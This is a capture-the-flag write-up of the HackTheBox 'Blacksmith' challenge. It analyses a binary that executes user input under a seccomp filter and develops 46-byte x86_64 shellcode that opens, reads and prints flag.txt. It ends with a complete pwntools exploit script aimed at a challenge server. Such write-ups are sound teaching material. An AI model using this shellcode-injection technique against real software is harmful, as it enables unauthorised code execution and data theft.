Blacksmith (HackTheBox)
Hey all. Today we're going to discuss the retired Blacksmith challenge on HackTheBox. The description on HackTheBox is as follows:
You are the only one who is capable of saving this town and bringing peace upon this land! You found a blacksmith who can create the most powerful weapon in the world! You can find him under the label "./flag.txt".
In this write-up, we will learn about seccomp, writing assembly, and performing syscalls.
Summary
- First looks
- Finding vulnerability primitives
- Developing AMD64 (x86_64) assembly
- Retrieving the flag
First looks
We are given the blacksmith
executable binary. Upon running the binary, we are presented with a menu to trade items:
$ ./blacksmith
Traveler, I need some materials to fuse in order to create something really powerful!
Do you have the materials I need to craft the Ultimate Weapon?
1. Yes, everything is here!
2. No, I did not manage to bring them all!
> 1
What do you want me to craft?
1. sword
2. shield
3. bow
> 3
This bow's range is the best!
Too bad you do not have enough materials to craft some arrows too..
Usually, I start by checking the binary's security using pwntools' checksec
. In this case, the security of blacksmith
binary is:
$ checksec blacksmith
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX disabled
PIE: PIE enabled
RWX: Has RWX segments
The fields in checksec mean the following:
- Arch: the CPU architecture and instruction set (x86, ARM, MIPS, ...)
- RELRO: Relocation Read-Only - secures the dynamic linking process
- Stack Canaries: protects against stack buffer overflow attacks
- NX: No eXecute - write-able memory cannot be executed
- PIE: Position Independable Executable - address randomization
- RWX: Read Write Execute - there's memory that's RWX
The logical conclusion is that we need to write a shellcode to the RWX memory to read out flag.txt
(based on the challenge description).
Finding vulnerability primitives
To start, a vulnerability primitive is a building block of an exploit. A primitive can be bundled with other primitives to achieve a higher impact, like teamwork. An example of primitives working together is as follows:
- an information leak primitive to leak an address
- an arbitrary write primitive to control the execution flow
... which can work together by controlling the execution flow by writing a leaked address.
Main analysis
When I want to find vulnerability primitives, I open the binary in Ghidra, Ghidra is a reverse engineering tool developed by the NSA (yes, that NSA). I start off analyzing a binary at the main
function. In this case, it looked like the following:
void main(void)
{
size_t __n;
long in_FS_OFFSET;
int i_has_things;
int i_option;
char *local_20;
char *local_18;
long __can_token;
__can_token = *(long *)(in_FS_OFFSET + 0x28);
setup();
// ...
__isoc99_scanf("%d",&i_has_things);
if (i_has_things != 1) {
puts("Farewell traveler! Come back when you have all the materials!");
exit(34);
}
printf(s_What_do_you_want_me_to_craft?_1._001012e0);
__isoc99_scanf("%d",&i_option);
sec();
if (i_option == 2) {
shield();
} else if (i_option == 3) {
bow();
} else if (i_option == 1) {
sword();
} else {
write(STDOUT_FILENO,local_18,strlen(local_18));
exit(261);
}
if (__can_token != *(long *)(in_FS_OFFSET + 0x28)) {
__stack_chk_fail();
}
return;
}
So, the main
function does the following:
- setup()
- sec()
- shield(), bow() or sword()
In addition to that, the main function uses canary tokens in variable __can_token
. As you can see, if __can_token
is not equal to the original value, it means that stack corruption has been detected and hence, __stack_chk_fail
is called which exits the program.
The function setup
removes the buffer for stdout and stdin, which is standard and hence not interesting. In contrast, the sec
function is interesting.
Sec function
void sec(void)
{
void* ctx;
long in_FS_OFFSET;
long __can_token;
__can_token = *(long *)(in_FS_OFFSET + 0x28);
// ...
// allow sys_read, sys_write,
// sys_open, sys_exit
ctx = seccomp_init(0);
seccomp_rule_add(ctx,0x7fff0000,2,0);
seccomp_rule_add(ctx,0x7fff0000,0,0);
seccomp_rule_add(ctx,0x7fff0000,1,0);
seccomp_rule_add(ctx,0x7fff0000,60,0);
seccomp_load(ctx);
if (__can_token != *(long *)(in_FS_OFFSET + 0x28)) {
__stack_chk_fail();
}
return;
}
We can see that the sec
function primarily creates an allow list using seccomp
of the syscalls sys_read
, sys_write
, sys_open
, and sys_exit
. (Note that the naming convention for internal syscall functions is a sys_
prefix. When we say sys_read
, we mean the syscall read
.) By doing this, the developer of the program prevents us from executing our shell on the server since we would need to sys_execve("/bin/sh", NULL, NULL)
for that. Because sys_execve
is not on the allow list, we cannot use it. Remember this for later.
Shield analysis
Furthermore, we have the shield()
, bow()
or sword()
calls in main()
. The bow()
and sword()
functions crash the program before a user can give input, which means that's irrelevant. So basically, the vulnerability must be in shield()
.
void shield(void)
{
size_t strlen;
long in_FS_OFFSET;
char buf[72];
long __can_token;
__can_token = *(long *)(in_FS_OFFSET + 0x28);
strlen = ::strlen(s_Excellent_choice!_This_luminous_s_00101080);
write(1,s_Excellent_choice!_This_luminous_s_00101080,strlen);
strlen = ::strlen("Do you like your new weapon?\n> ");
write(1,"Do you like your new weapon?\n> ",strlen);
read(0,buf,63);
(*(code *)buf)();
if (__can_token != *(long *)(in_FS_OFFSET + 0x28)) {
// WARNING: Subroutine does not return
__stack_chk_fail();
}
return;
}
What sticks out to me in this function is that we have user input and are calling a variable like a function using (*(code *)buf)();
. The code (*(code *)buf)();
is equivalent to the ASM below:
00100dd9 48 8d 55 LEA RDX, [RBP - 0x50] ; code* RDX = &buf
b0
00100ddd b8 00 00 MOV RAX, 0x0
00 00
00100de2 ff d2 CALL RDX ; RDX()
(*(code *)buf)();
The (*(code *)buf)();
function call executes the buf
variable on the stack as if it was assembly. This means we can inject assembly into the program.
Developing AMD64 (x64_86) assembly
We have an arbitrary execution primitive so we need to write an assembly payload. The difficulty with this is that:
- We have
63
bytes to work with:
// shield() function
read(STDIN_FILENO,buf,63);
(*(code *)buf)();
- We can only use
sys_read
,sys_write
,sys_open
andsys_exit
:
// sec() function
// allow sys_read, sys_write,
// sys_open, sys_exit
ctx = seccomp_init(0);
seccomp_rule_add(ctx,0x7fff0000,2,0);
seccomp_rule_add(ctx,0x7fff0000,0,0);
seccomp_rule_add(ctx,0x7fff0000,1,0);
seccomp_rule_add(ctx,0x7fff0000,60,0);
seccomp_load(ctx);
- We do not have a stack address (ASLR)
However, the challenge description told us that we need to read the flag.txt
file. Hence, the strategy for this payload is opening flag.txt
, reading flag.txt
into a buffer, and writing the buffer to stdout
.
To interact with those files, we need to utilize system calls ("syscalls"). Syscalls are essentially an ABI (binary API) with the Linux kernel which is like the god of the operating system. The kernel provides memory management, CPU scheduling, driver management, hardware IO, et cetera. If you want to learn more about the kernel, the book "Linux Kernel Development" by Robert Love is an excellent way to learn more about the kernel (I've read it).
I used a Linux x64 syscall table as a reference for using the syscalls. Essentially the code should do the following:
// sys_open(char* filename, int flags, int mode)
int fd = sys_open("flag.txt", 0, 0);
// sys_read(int fd, char* buf, size_t count)
int written = sys_read(fd, buf, 0x9999);
// sys_write(int fd, char* buf, size_t count)
sys_write(1, buf, written);
I came up with the following ASM:
mov rax, 2
lea rdi, [rip+41] ; flag.txt will be at the end of the payload
xor rsi, rsi
xor rdx, rdx
syscall
mov rsi, rdi
mov rdi, rax
xor rax, rax
mov rdx, 30
syscall
mov rdx, rax
mov rax, 1
mov rdi, rax
syscall
Since we have only 63 bytes to work with, I had to be creative. In assembly, most bytes are allocated to constant values like mov rax, 2
since it will store an 8-byte 0x00000000 00000002
into the instruction. That means we can save a lot of bytes by reusing register values.
I eventually refactored the payload into 46 bytes:
push r10
inc r10
mov rax, r10
lea rdi, [rip+31] ; flag.txt will be at the end of the payload
xor rsi, rsi
xor rdx, rdx
syscall
mov rsi, rdi
mov rdi, rax
xor rax, rax
mov rdx, r11
syscall
mov rdx, rax
pop rax
mov rdi, rax
syscall
Retrieving the flag
Now we have a steady payload, we need to send it to the application. I made the following script using pwntools:
#!/usr/bin/python3
from pwn import remote, gdb, ELF, asm, context
import time
e = ELF('blacksmith')
is_remote = True
if is_remote:
p = remote("64.227.36.64", 32615)
else:
p = e.process()
context.binary = e.path # set the pwntools context for asm()
p.sendlineafter(b"all!\n> ", b'1')
p.sendlineafter(b"\xf0\x9f\x8f\xb9\n> ", b'2') # get to shield()
payload = asm(f'''push r10
inc r10
mov rax, r10
lea rdi, [rip+31]
xor rsi, rsi
xor rdx, rdx
syscall
mov rsi, rdi
mov rdi, rax
xor rax, rax
mov rdx, r11
syscall
mov rdx, rax
pop rax
mov rdi, rax
syscall''')
print(f"writing ASM with {len(payload)} bytes")
# payload = payload + filler + filename
payload += b"flag.txt"
print(f"writing ASM+filename with {len(payload)} bytes")
p.sendafter(b"weapon?\n> ", payload)
while True:
print(p.recvline())